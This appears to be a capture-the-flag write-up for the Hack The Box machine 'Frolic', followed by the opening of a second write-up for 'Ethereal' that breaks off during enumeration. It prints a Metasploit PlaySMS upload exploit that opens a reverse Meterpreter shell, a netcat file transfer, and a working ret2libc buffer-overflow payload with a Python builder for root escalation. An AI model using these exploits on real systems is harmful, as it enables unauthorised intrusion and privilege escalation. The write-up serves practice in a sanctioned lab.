Hackthebox Frolic Writeup


Explanation

Hackthebox is a website with a bunch of vulnerable machines reachable over its own VPN. This is a write-up of the machine “Frolic” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.111 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-15 09:44 EEST
Nmap scan report for 10.10.10.111
Host is up (0.035s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open  http        Node.js (Express middleware)
|_http-title: Node-RED
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h55m15s, deviation: 3h10m30s, median: -5m16s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2018-10-15T12:10:26+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-10-15 09:40:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.70 seconds

Gobuster HTTP port 1880:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.111:1880 -x .html,.php

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.111:1880/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : html,php
[+] Timeout      : 10s
=====================================================
2019/03/22 15:21:35 Starting gobuster
=====================================================
/red (Status: 301)
/vendor (Status: 301)
=====================================================
2019/03/22 16:05:09 Finished
=====================================================

Gobuster HTTP port 9999:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.111:9999 -x .html,.php

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.111:9999/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : html,php
[+] Timeout      : 10s
=====================================================
2019/03/22 14:35:52 Starting gobuster
=====================================================
/admin (Status: 301)
/test (Status: 301)
/dev (Status: 301)
/backup (Status: 301)
/loop (Status: 301)
=====================================================
2019/03/22 15:18:58 Finished
=====================================================

2. Getting User

We can find a login page at “/admin” on port 9999.
The login form is validated client-side by “/admin/js/login.js”, which contains the hard-coded password “superduperlooperpassword_lol”:

root@kali:~# curl http://10.10.10.111:9999/admin/js/login.js
var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}
else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("submit").disabled = true;
return false;
}
}
}

The page it redirects to, “/admin/success.html”, contains an encoded message:

root@kali:~# cat success.html
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.

This looks like noise, but it is Short Ook! (a Brainfuck derivative written with only “.”, “?” and “!”), not encryption; an online Ook! interpreter decodes it.

The decoded text points at another path. Let’s try /asdiSIAJJ0QWE9JAS.

That page contains a base64 encoded blob.
We can find out what it is with the following commands.

root@kali:~# echo -n UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA | base64 -d > b64file

root@kali:~# file b64file
b64file: Zip archive data, at least v2.0 to extract

So we have a .zip file. It is password protected, but the password is simply “password”.

root@kali:~# unzip b64file
Archive:  b64file
[b64file] index.php password:  # type "password"
  inflating: index.php

The content of index.php is a hex string.

root@kali:~# cat index.php 
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

Decoding the hex to ASCII (Burp Decoder, or xxd -r -p on the command line) gives:

root@kali:~# cat frolic.b64 
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

This text is base64 encoded. Decode it:

root@kali:~# cat frolic.b64 | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<

The result is a Brainfuck program. Again, an online interpreter runs it.
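The three layers above (hex, then base64, then Brainfuck) can be unwrapped offline instead of pasting into web tools. The following script is an added example and not part of the original writeup; it embeds the index.php hex exactly as printed above and includes a small Brainfuck interpreter (8-bit wrapping cells, no input), so it reproduces the password without any third-party site:

```python
import base64

# index.php as printed above: hex text, one base64 line per CRLF-terminated row.
INDEX_PHP_HEX = (
    "4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a"
    "4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a"
    "4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a"
    "4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a"
)


def brainfuck(code, max_steps=1_000_000):
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, output returned as a str.

    Unknown characters (spaces, newlines) are ignored, which is what lets the
    space-separated program from the page run as-is.
    """
    # Pre-compute matching brackets so every jump is O(1).
    jumps, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced brackets")

    tape = [0] * 30000
    ptr = pc = steps = 0
    out = []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit hit; program does not terminate?")
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer moved left of cell 0")
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0          # no input is provided in this use
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]         # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]         # back to the matching '['
        pc += 1
    return "".join(out)


def decode_index_php(hex_text):
    """hex -> base64 text -> Brainfuck source -> run it."""
    b64_text = bytes.fromhex(hex_text)
    # b64decode() discards the embedded CRLFs because they are not alphabet chars.
    bf_source = base64.b64decode(b64_text).decode("ascii")
    return brainfuck(bf_source)


if __name__ == "__main__":
    print(decode_index_php(INDEX_PHP_HEX))
```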

The Brainfuck output is a password. Enumerating “/dev/backup” reveals that PlaySMS is installed at “/playsms”, and the password logs in there.

The credential is “admin:idkwhatispass”.

searchsploit:

root@kali:~# searchsploit playsms
---------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                          |  Path
                                                                                        | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------- ----------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)      | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload      | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                        | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)  | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                     | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                             | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                          | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                   | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                 | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                            | exploits/php/webapps/30177.txt
---------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

This time, we can use the exploit “PlaySMS - ‘import.php’ (Authenticated) CSV File Upload Code Execution (Metasploit)”

msf5 > use exploit/multi/http/playsms_uploadcsv_exec 
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
rhosts => 10.10.10.111
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set lhost tun0
lhost => tun0
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
rport => 9999
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms/
targeturi => /playsms/
msf5 exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
password => idkwhatispass
msf5 exploit(multi/http/playsms_uploadcsv_exec) > run

[*] Started reverse TCP handler on 10.10.14.23:4444 
[+] Authentication successful: admin:idkwhatispass
[*] Sending stage (38247 bytes) to 10.10.10.111
[*] Meterpreter session 1 opened (10.10.14.23:4444 -> 10.10.10.111:38400) at 2019-03-24 09:18:33 +0200

meterpreter > shell
Process 6996 created.
Channel 0 created.
cd /home
ls -la
total 16
drwxr-xr-x  4 root  root  4096 Sep 23 17:56 .
drwxr-xr-x 22 root  root  4096 Sep 23 17:16 ..
drwxr-xr-x  3 ayush ayush 4096 Sep 25 02:00 ayush
drwxr-xr-x  7 sahay sahay 4096 Sep 25 02:45 sahay
cd ayush
ls -la
total 36
drwxr-xr-x 3 ayush ayush 4096 Sep 25 02:00 .
drwxr-xr-x 4 root  root  4096 Sep 23 17:56 ..
-rw------- 1 ayush ayush 2781 Sep 25 02:47 .bash_history
-rw-r--r-- 1 ayush ayush  220 Sep 23 17:56 .bash_logout
-rw-r--r-- 1 ayush ayush 3771 Sep 23 17:56 .bashrc
drwxrwxr-x 2 ayush ayush 4096 Sep 25 02:43 .binary
-rw-r--r-- 1 ayush ayush  655 Sep 23 17:56 .profile
-rw------- 1 ayush ayush  965 Sep 25 01:58 .viminfo
-rwxr-xr-x 1 ayush ayush   33 Sep 25 01:58 user.txt
cat user.txt
2ab95909cf509f85a6f476b59a0c2fe0

3. Getting Root

Among the SUID binaries, one stands out: /home/ayush/.binary/rop.

find / -perm -4000 2>/dev/null
/sbin/mount.cifs
/bin/mount
/bin/ping6
/bin/fusermount
/bin/ping
/bin/umount
/bin/su
/bin/ntfs-3g
/home/ayush/.binary/rop
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

This binary “rop” takes 1 argument.

./rop
[*] Usage: program <message>
hoge
/bin/sh: 14: hoge: not found

A long argument causes a segmentation fault, which suggests the argument is copied into a fixed-size stack buffer without a length check.

./rop aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)

Besides, ASLR is disabled (randomize_va_space is 0), so libc is mapped at the same address on every run.

cat /proc/sys/kernel/randomize_va_space
0

This means “rop” has an exploitable stack buffer overflow, and with a fixed libc base we can build a ret2libc chain that calls system("/bin/sh") with the binary’s SUID root privileges.
First, we have to copy the binary to our machine for analysis.

# on localhost
root@kali:~# nc -nlvp 443 > rop
listening on [any] 443 ...

# on 10.10.10.111
nc 10.10.14.23 443 < /home/ayush/.binary/rop

Then we have to find the offset from the start of the buffer to the saved return address. Create a cyclic pattern:

root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Running it under gdb, the crash happens because the program tried to return to “0x62413762”, a value taken from our pattern:

root@kali:~# gdb rop
GNU gdb (Debian 8.2.1-2) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop...(no debugging symbols found)...done.
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
Starting program: /root/rop Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x62413762 in ?? ()

The address “0x62413762” comes from our pattern. pattern_offset.rb tells us the saved return address sits 52 bytes into the buffer.

root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x62413762
[*] Exact match at offset 52

Next we need the base address at which libc.so.6 is loaded in the target’s process. Run ldd on the target (ASLR is off there, so the address is stable across runs; addresses from our Kali box would not apply):

ldd rop
linux-gate.so.1 =>  (0xb7fda000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0xb7fdb000)

Then we need the offsets of “/bin/sh”, “system” and “exit” inside that same libc (again on the target, since our local libc is a different build).

# address of "/bin/sh"
strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 15ba0b /bin/sh

# address of system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

# address of exit
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
   112: 0002edc0    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
   450: 0002edf0   197 FUNC    GLOBAL DEFAULT   13 __cxa_thread_atexit_impl@@GLIBC_2.18
   558: 000b07c8    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
   616: 00115fa0    56 FUNC    GLOBAL DEFAULT   13 svc_exit@@GLIBC_2.0
   652: 0002eda0    31 FUNC    GLOBAL DEFAULT   13 quick_exit@@GLIBC_2.10
   876: 0002ebf0    85 FUNC    GLOBAL DEFAULT   13 __cxa_atexit@@GLIBC_2.1.3
  1046: 0011fb80    52 FUNC    GLOBAL DEFAULT   13 atexit@GLIBC_2.0
  1394: 001b2204     4 OBJECT  GLOBAL DEFAULT   33 argp_err_exit_status@@GLIBC_2.1
  1506: 000f3870    58 FUNC    GLOBAL DEFAULT   13 pthread_exit@@GLIBC_2.0
  2108: 001b2154     4 OBJECT  GLOBAL DEFAULT   33 obstack_exit_failure@@GLIBC_2.0
  2263: 0002e9f0    78 FUNC    WEAK   DEFAULT   13 on_exit@@GLIBC_2.0
  2406: 000f4c80     2 FUNC    GLOBAL DEFAULT   13 __cyg_profile_func_exit@@GLIBC_2.2

Adding each offset to the libc base gives our target addresses:

system:  0xb7e19000 + 0x0003ada0 = 0xb7e53da0
exit:    0xb7e19000 + 0x0002e9d0 = 0xb7e479d0
/bin/sh: 0xb7e19000 + 0x15ba0b   = 0xb7f74a0b

To obtain a root shell, execute ./rop on the target with this payload: 52 bytes of padding, then the address of system(), then the address system() returns to (exit(), for a clean exit instead of a crash), then the address of the string “/bin/sh” as system()’s argument. Each address is written little-endian (the original writeup had a typo, \xb4, in the last byte of the exit address; it is \xb7) and must not contain a null byte, because argv strings are NUL-terminated:

./rop `python -c "print 'A'*52 + '\xa0\x3d\xe5\xb7' + '\xd0\x79\xe4\xb7' + '\x0b\x4a\xf7\xb7'"`
id
uid=0(root) gid=33(www-data) groups=33(www-data)
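Building the payload by hand is error-prone: a single wrong byte in one of the three addresses, or a stray NUL, and the chain silently fails. The script below is an added example, not from the original writeup. It computes the same addresses from the libc base and offsets found above, lays out the ret2libc frame, and refuses to emit a payload containing a null byte, since argv strings end at the first NUL. The file name exploit.py and the python3 invocation are assumptions; on the target you would deliver the bytes with whatever Python is installed:

```python
import struct
import sys

# Numbers from this writeup: libc base from ldd on the target, symbol offsets from
# readelf/strings on the target's libc, crash offset from pattern_offset.rb.
LIBC_BASE = 0xb7e19000
OFFSETS = {"system": 0x0003ada0, "exit": 0x0002e9d0, "binsh": 0x15ba0b}
RET_OFFSET = 52  # bytes from the start of the buffer to the saved return address


def p32(addr):
    """Pack a 32-bit address little-endian, the way it is laid out on an x86 stack."""
    return struct.pack("<I", addr)


def resolve(base, offsets):
    """Turn libc-relative offsets into absolute addresses for one fixed base (no ASLR)."""
    return {name: base + off for name, off in offsets.items()}


def build_ret2libc(ret_offset, system, ret_after, arg):
    """
    Classic 32-bit ret2libc frame:
        [padding][&system][&exit][&"/bin/sh"]
    The overwritten return address sends execution into system(). From system()'s
    point of view the next dword is *its* return address (exit(), so the process
    ends cleanly) and the dword after that is its first argument, the pointer to
    the "/bin/sh" string inside libc.
    """
    payload = b"A" * ret_offset + p32(system) + p32(ret_after) + p32(arg)
    # The payload travels in argv[], a NUL-terminated C string: any 0x00 byte
    # would silently cut the chain short. Refuse to emit such a payload.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte and would be truncated in argv")
    return payload


def frolic_payload():
    a = resolve(LIBC_BASE, OFFSETS)
    return build_ret2libc(RET_OFFSET, a["system"], a["exit"], a["binsh"])


if __name__ == "__main__":
    # Usage on the target (ASLR off, assumed file name):  ./rop "$(python3 exploit.py)"
    sys.stdout.buffer.write(frolic_payload())
```

The NUL check matters more than it looks: a libc mapped at a base like 0x00xxxxxx, or an address with a 0x00 byte in the middle, cannot be delivered through argv at all, and the symptom is just another segfault.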

As always, root.txt is in the directory /root.

cat /root/root.txt
85d3fdf03f969892538ba9a731826222

Hackthebox Ethereal Writeup


Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Service Pack 1
  • Virtualization: Virtualbox 5.2.22
  • MSI builder: Wix Toolset v3.11.1

Explanation:

Hackthebox is a website with a bunch of vulnerable machines reachable over its own VPN. This is a write-up of the machine “Ethereal”.

Solution:

1. Initial Enumeration

TCP Port scanning:

root@kali:~# nmap -p- 10.10.10.106 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-07 19:56 EET
Stats: 0:20:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 75.77% done; ETC: 20:23 (0:06:33 remaining)
Nmap scan report for 10.10.10.106
Host is up (0.12s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1628.08 seconds

FTP enumeration:

root@kali:~# ftp 10.10.10.106
Connected to 10.10.10.106.
220 Microsoft FTP Service
Name (10.10.10.106:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
07-10-18  09:03PM       <DIR>          binaries
09-02-09  08:58AM                 4122 CHIPSET.txt
01-12-03  08:58AM              1173879 DISK1.zip
01-22-11  08:58AM               182396 edb143en.exe
01-18-11  11:05AM                98302 FDISK.zip
07-10-18  08:59PM       <DIR>          New folder
07-10-18  09:38PM       <DIR>          New folder (2)
07-09-18  09:23PM       <DIR>          subversion-1.10.0
11-12-16  08:58AM                 4126 teamcity-server-log4j.xml
226 Transfer complete.

gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.106 -x aspx

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.106/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : aspx
[+] Timeout      : 10s
=====================================================
2019/03/07 20:28:10 Starting gobuster
=====================================================
/default.aspx (Status: 200)
/Default.aspx (Status: 200)
/corp (Status: 301)
/Corp (Status: 301)
/DEFAULT.aspx (Status: 200)
/CORP (Status: 301)
=====================================================
2019/03/07 22:21:57 Finished
=====================================================

gobuster HTTP /corp:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.106/corp -x aspx

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.106/corp/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : aspx
[+] Timeout      : 10s
=====================================================
2019/03/07 22:32:06 Starting gobuster
=====================================================
/img (Status: 301)
/login (Status: 301)
/help (Status: 301)
/css (Status: 301)
/Help (Status: 301)
/Login (Status: 301)
/js (Status: 301)
/console (Status: 301)
/IMG (Status: 301)
/CSS (Status: 301)
/Img (Status: 301)
/JS (Status: 301)
/Console (Status: 301)
/HELP (Status: 301)
/LogIn (Status: 301)
/LOGIN (Status: 301)
=====================================================
2019/03/08 00:27:06 Finished
=====================================================

2. Getting User

As always, start with the web application.
Clicking “MENU” reveals a link to an admin console.

Clicking “Menu” again and then “PING” redirects us to ethereal.htb:8080, so we have to add the following line to “/etc/hosts”.

10.10.10.106 ethereal.htb

The console on port 8080 asks for credentials. Since we don’t have any yet, continue our enumeration.

FTP enumeration turned up some interesting zip files.
The files inside them have no extension.

root@kali:~# unzip DISK1.zip
Archive:  DISK1.zip
  inflating: DISK1
  inflating: DISK2
root@kali:~# unzip FDISK.zip
Archive:  FDISK.zip
  inflating: FDISK

By executing file command, we can figure out these are disk images.

root@kali:~# file DISK1
DISK1: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", root entries 224, sectors 2880 (volumes <=32 MB), sectors/FAT 9, sectors/track 18, serial number 0x8c271e81, unlabeled, FAT (12 bit), followed by FAT
root@kali:~# file DISK2
DISK2: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", root entries 224, sectors 2880 (volumes <=32 MB), sectors/FAT 9, sectors/track 18, serial number 0x8c271fb9, unlabeled, FAT (12 bit), followed by FAT
root@kali:~# file FDISK
